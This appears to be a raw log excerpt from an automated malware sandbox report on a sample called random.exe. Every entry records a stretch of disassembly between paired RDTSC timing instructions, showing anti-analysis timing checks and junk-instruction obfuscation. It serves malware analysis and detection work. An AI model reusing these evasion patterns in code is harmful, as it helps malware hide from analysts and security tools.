Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BB9C1 second address: 8BB9CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F19A4F65036h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BB9CE second address: 8BB9D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BBD8E second address: 8BBD94 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BE49B second address: 8BE4A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BE4A0 second address: 8BE4B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F19A4F65036h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BE4B4 second address: 8BE4C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BE4C7 second address: 8BE4D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F19A4F65036h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BE4D1 second address: 8BE4E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BE5AC second address: 8BE5B6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F19A4F65036h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BE5B6 second address: 8BE5D7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F19A4DEDF36h 0x00000008 jmp 00007F19A4DEDF30h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BE5D7 second address: 8BE5DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BE5DE second address: 8BE628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jne 00007F19A4DEDF31h 0x00000011 mov eax, dword ptr [eax] 0x00000013 push edx 0x00000014 jmp 00007F19A4DEDF38h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e jl 00007F19A4DEDF34h 0x00000024 push eax 0x00000025 push edx 0x00000026 ja 00007F19A4DEDF26h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BE8C1 second address: 8BE8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BE905 second address: 8BE9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F19A4DEDF2Eh 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 mov dword ptr [ebp+122D19A2h], edx 0x00000016 push 00000000h 0x00000018 mov ecx, dword ptr [ebp+122D2CB5h] 0x0000001e push 4A81E856h 0x00000023 jnc 00007F19A4DEDF34h 0x00000029 xor dword ptr [esp], 4A81E8D6h 0x00000030 mov edi, dword ptr [ebp+122D2D1Dh] 0x00000036 jc 00007F19A4DEDF2Ch 0x0000003c mov dword ptr [ebp+122D2409h], esi 0x00000042 push 00000003h 0x00000044 pushad 0x00000045 mov eax, dword ptr [ebp+122D3371h] 0x0000004b jmp 00007F19A4DEDF39h 0x00000050 popad 0x00000051 push 00000000h 0x00000053 mov edx, dword ptr [ebp+122D2B31h] 0x00000059 mov dword ptr [ebp+122D398Fh], esi 0x0000005f push 00000003h 0x00000061 movzx esi, ax 0x00000064 call 00007F19A4DEDF29h 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c jl 00007F19A4DEDF26h 0x00000072 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BE9A6 second address: 8BE9B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F19A4F6503Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BE9B8 second address: 8BE9CA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007F19A4DEDF44h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BE9CA second address: 8BE9FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F65046h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jno 00007F19A4F6503Ah 0x00000013 mov eax, dword ptr [eax] 0x00000015 jl 00007F19A4F6503Eh 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B3AFA second address: 8B3B1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F19A4DEDF26h 0x00000009 jmp 00007F19A4DEDF2Ah 0x0000000e jl 00007F19A4DEDF26h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jns 00007F19A4DEDF26h 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DDDB6 second address: 8DDDBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DE1BF second address: 8DE1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DE46B second address: 8DE47B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F19A4F6503Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DEB36 second address: 8DEB53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF37h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DEB53 second address: 8DEB99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F19A4F65044h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F19A4F6503Fh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F19A4F65047h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DED0C second address: 8DED11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DF06A second address: 8DF07C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 je 00007F19A4F65036h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F19A4F65036h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DF64F second address: 8DF667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push edx 0x00000008 jmp 00007F19A4DEDF2Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DF95F second address: 8DF963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DF963 second address: 8DF97D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F19A4DEDF26h 0x00000008 jl 00007F19A4DEDF26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 je 00007F19A4DEDF26h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DF97D second address: 8DF998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19A4F65045h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DFAEA second address: 8DFAEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DFE19 second address: 8DFE35 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F19A4F65036h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jp 00007F19A4F65036h 0x00000015 pop ebx 0x00000016 popad 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DFE35 second address: 8DFE3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8E5D26 second address: 8E5D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19A4F6503Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8AB564 second address: 8AB56A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8AB56A second address: 8AB584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F19A4F65042h 0x0000000a jnp 00007F19A4F65036h 0x00000010 jne 00007F19A4F65036h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8AB584 second address: 8AB58A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8AB58A second address: 8AB58E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EB876 second address: 8EB87C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EBB22 second address: 8EBB28 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EBB28 second address: 8EBB62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F19A4DEDF31h 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F19A4DEDF37h 0x00000013 popad 0x00000014 jo 00007F19A4DEDF2Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EBB62 second address: 8EBB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EBCA6 second address: 8EBCAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EEAE5 second address: 8EEAEF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F19A4F65036h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EEAEF second address: 8EEB0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F19A4DEDF26h 0x00000009 jmp 00007F19A4DEDF2Fh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EECEA second address: 8EECF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F19A4F65036h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EECF4 second address: 8EED01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EEEE1 second address: 8EEEE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EF395 second address: 8EF399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EF42E second address: 8EF454 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F6503Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c mov dword ptr [ebp+122D2565h], ecx 0x00000012 nop 0x00000013 pushad 0x00000014 jng 00007F19A4F65038h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EF454 second address: 8EF458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EF458 second address: 8EF45C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EF45C second address: 8EF47A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F19A4DEDF34h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EF47A second address: 8EF47F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EF6F6 second address: 8EF6FC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EF7DE second address: 8EF7F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jg 00007F19A4F65038h 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F19A4F65036h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EF7F6 second address: 8EF7FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8F091C second address: 8F0920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8F4486 second address: 8F4516 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F19A4DEDF2Ah 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F19A4DEDF28h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov dword ptr [ebp+12465898h], edi 0x0000002d push 00000000h 0x0000002f mov esi, ebx 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007F19A4DEDF28h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 0000001Ch 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d call 00007F19A4DEDF37h 0x00000052 push ecx 0x00000053 jg 00007F19A4DEDF26h 0x00000059 pop edi 0x0000005a pop edi 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push edx 0x0000005f jg 00007F19A4DEDF26h 0x00000065 pop edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8F6E2C second address: 8F6E35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8F6E35 second address: 8F6E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jno 00007F19A4DEDF3Ch 0x0000000f nop 0x00000010 mov edi, 457075C3h 0x00000015 push 00000000h 0x00000017 stc 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F19A4DEDF28h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 call 00007F19A4DEDF2Ch 0x00000039 mov dword ptr [ebp+1244FB83h], esi 0x0000003f pop edi 0x00000040 push eax 0x00000041 push edx 0x00000042 push esi 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8F7E8A second address: 8F7E93 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8F7052 second address: 8F7061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19A4DEDF2Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8F7061 second address: 8F7067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8F7E93 second address: 8F7EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19A4DEDF35h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F19A4DEDF2Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8F80E6 second address: 8F80EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8F900B second address: 8F907A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F19A4DEDF28h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d cmc 0x0000000e push dword ptr fs:[00000000h] 0x00000015 jmp 00007F19A4DEDF2Fh 0x0000001a jns 00007F19A4DEDF2Ch 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 pushad 0x00000028 push ebx 0x00000029 movsx ecx, di 0x0000002c pop esi 0x0000002d mov dword ptr [ebp+122D1C6Ah], esi 0x00000033 popad 0x00000034 mov eax, dword ptr [ebp+122D1719h] 0x0000003a mov edi, dword ptr [ebp+122D2A1Dh] 0x00000040 push FFFFFFFFh 0x00000042 jmp 00007F19A4DEDF2Bh 0x00000047 nop 0x00000048 pushad 0x00000049 jc 00007F19A4DEDF2Ch 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8F80EB second address: 8F8175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov ebx, dword ptr [ebp+122D2D31h] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov dword ptr [ebp+122D39F3h], edi 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push esi 0x00000027 call 00007F19A4F65038h 0x0000002c pop esi 0x0000002d mov dword ptr [esp+04h], esi 0x00000031 add dword ptr [esp+04h], 00000014h 0x00000039 inc esi 0x0000003a push esi 0x0000003b ret 0x0000003c pop esi 0x0000003d ret 0x0000003e mov bh, 63h 0x00000040 sub ebx, dword ptr [ebp+122D1C8Eh] 0x00000046 mov eax, dword ptr [ebp+122D05E1h] 0x0000004c push 00000000h 0x0000004e push ebp 0x0000004f call 00007F19A4F65038h 0x00000054 pop ebp 0x00000055 mov dword ptr [esp+04h], ebp 0x00000059 add dword ptr [esp+04h], 00000014h 0x00000061 inc ebp 0x00000062 push ebp 0x00000063 ret 0x00000064 pop ebp 0x00000065 ret 0x00000066 push FFFFFFFFh 0x00000068 and ebx, 0D8C4520h 0x0000006e nop 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F19A4F65045h 0x00000076 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8F907A second address: 8F907E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8F8175 second address: 8F8196 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F19A4F6503Ch 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F19A4F6503Ch 0x00000014 ja 00007F19A4F65036h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8F907E second address: 8F9096 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F19A4DEDF2Ch 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8F9EA2 second address: 8F9EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8FCFAF second address: 8FCFB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8FC02E second address: 8FC033 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8FC033 second address: 8FC057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F19A4DEDF38h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8FE1D9 second address: 8FE1DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 901F61 second address: 901F7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F19A4DEDF34h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 901F7F second address: 901F85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 901F85 second address: 901FE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c adc ebx, 15B447C9h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F19A4DEDF28h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D39D1h], ebx 0x00000034 mov edi, 347066E0h 0x00000039 push 00000000h 0x0000003b add dword ptr [ebp+122D39D1h], edx 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push esi 0x00000045 push edi 0x00000046 pop edi 0x00000047 pop esi 0x00000048 rdtsc
